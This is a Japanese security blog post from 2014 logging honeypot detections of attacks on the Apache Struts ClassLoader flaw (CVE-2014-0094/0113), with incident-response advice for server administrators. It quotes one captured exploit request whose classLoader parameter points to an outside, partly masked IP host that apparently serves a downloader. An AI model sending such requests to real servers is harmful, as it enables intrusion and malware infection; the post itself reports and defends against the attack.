www.morihi-soc.net

誰もが安心して使える、安全なインターネットを目指して

ハニーポット観察記録(19)

ただいま世間で騒がれている,Apache Struts の ClassLoader(CVE-2014-0094/CVE-2014-0113)の脆弱性を狙った攻撃を複数のハニーポットで検知しました.

検知した攻撃は下記のとおりです.

GET /toplel.action?class[‘classLoader’][‘resources’][‘dirContext’][‘********’]=//162.*.*.*/toplel HTTP/1.0
Host: *.*.*.*
Connection: close

※一部を意図的に*に変更しています.

 

リクエストのパラメータに classLoader と入っているので,明確に Struts を狙った攻撃であるといえます.

またパラメータを[”]で囲っているため,class.classLoader のような.(ドット)で繋げるパターンではないところがポイントですね.

 

さらに,全く同じ攻撃リクエストを複数のハニーポットおよび,私の管理下の Web サーバで複数回検知しています.(2014年4月26日 午前11:00現在)

  • ハニーポット1
    • 1回目の検知時刻:03:50
    • 2回目の検知時刻:08:32
  • ハニーポット2
    • 1回目の検知時刻:05:29
    • 2回目の検知時刻:10:12
  • www.morihi-soc.net
    • 1回目の検知時刻:03:50
    • 2回目の検知時刻:08:32

※いずれも2014年4月26日午前の日本時間に検知

上記以外にも,ハニーポットや Struts を利用した Web アプリケーションの無い Web サーバに対しても攻撃を検知していました.

そのため推測ですが,IPv4 空間全ての IP アドレスに対して,80/tcp ポートが空いていれば,上記のような内容で攻撃している可能性があります.

 

なおパラメータの最後の「toplel」に関しては,ファイルそのものが存在せず,どのようなファイルを読みこませようとしていたのかは不明です.(ファイルが存在しないから安全というわけではありません)

2014年5月1日追記
toplel に拡張子をつけた,toplel.exe であれば VirusTotal で調査した結果がありました.
どうやら何かのダウンローダ(感染後に他のマルウェアをダウンロードして二次感染させる動作をする)のようです.
toplel.exe の VirusTotal の解析結果

 

今回,狙われたファイルは「toplel.action」です.

もしこの名前で,Struts を利用している Web アプリケーションを公開しているサーバの管理者の人であれば,アクセスログおよび Web アプリケーションの動作状態を確認することをオススメします.

攻撃を受けた Web アプリケーションが脆弱な場合は,設定変更をされた影響で正常な動作をしていない可能性があります.

あせらずに,ログの確保をして Tomcat の再起動や,攻撃の送信元 IP アドレスを遮断したりするなど対応をしましょう.

2014年5月1日追記
toplel はネットスラングで,「皮肉的にあざ笑う」という意味だそうです.
Top Lel の意味・用法・例文

 

なおログはアクセスログを(可能であれば)そのまま,すべて保管しましょう.合わせて Web アプリケーションに関連するログ(データベースへのアクセスログや,IDS/IPS/WAF のログ等)と,時刻同期サーバの設定状況やサーバの設定情報を保管しましょう.

(コンピュータフォレンジックをすることになった場合,Chain of Custody とかログの正確性・信頼性とかの保証になる)

また被害を受けた場合には関係各所(警察IPAJPCERT/CC等)へ届け出することを検討してください.

そして可能な限り早急に Struts のバージョンアップか攻撃の緩和策を実施してください.

 

最後に,出来るサーバ管理者がやってしまいがちなことを注意点として挙げておきます.

アクセスログに残っているログをそのまま検索したり,Web 上の URL デコードサイトに入力したりしないでください.

どのような攻撃を受けたのかや,影響はどういったものかなど調査で急ぐ気持ちは分かります.

しかし,検索やデコードサイトでデコードする行為自身が,Struts の脆弱性を狙った攻撃とみなされる可能性があります.

そのため検索するときは短い単語で区切ったり,URL デコードしたいのならオフラインでデコードするソフトウェアを利用したりするなど,自衛に努めてください.

逆に通報されてしまいますのでご注意を.

 

参考情報

S2-021

Apache Struts2(2.3.16、S2-020の修正版)に対するゼロディを弊社エンジニアが発見いたしました。

Apache Struts 2の脆弱性が、サポート終了のApache Struts 1にも影響

Strutsの脆弱性CVE-2014-0094について改めてまとめてみた

 

Written by 森久

4月 26th, 2014 at 12:09 pm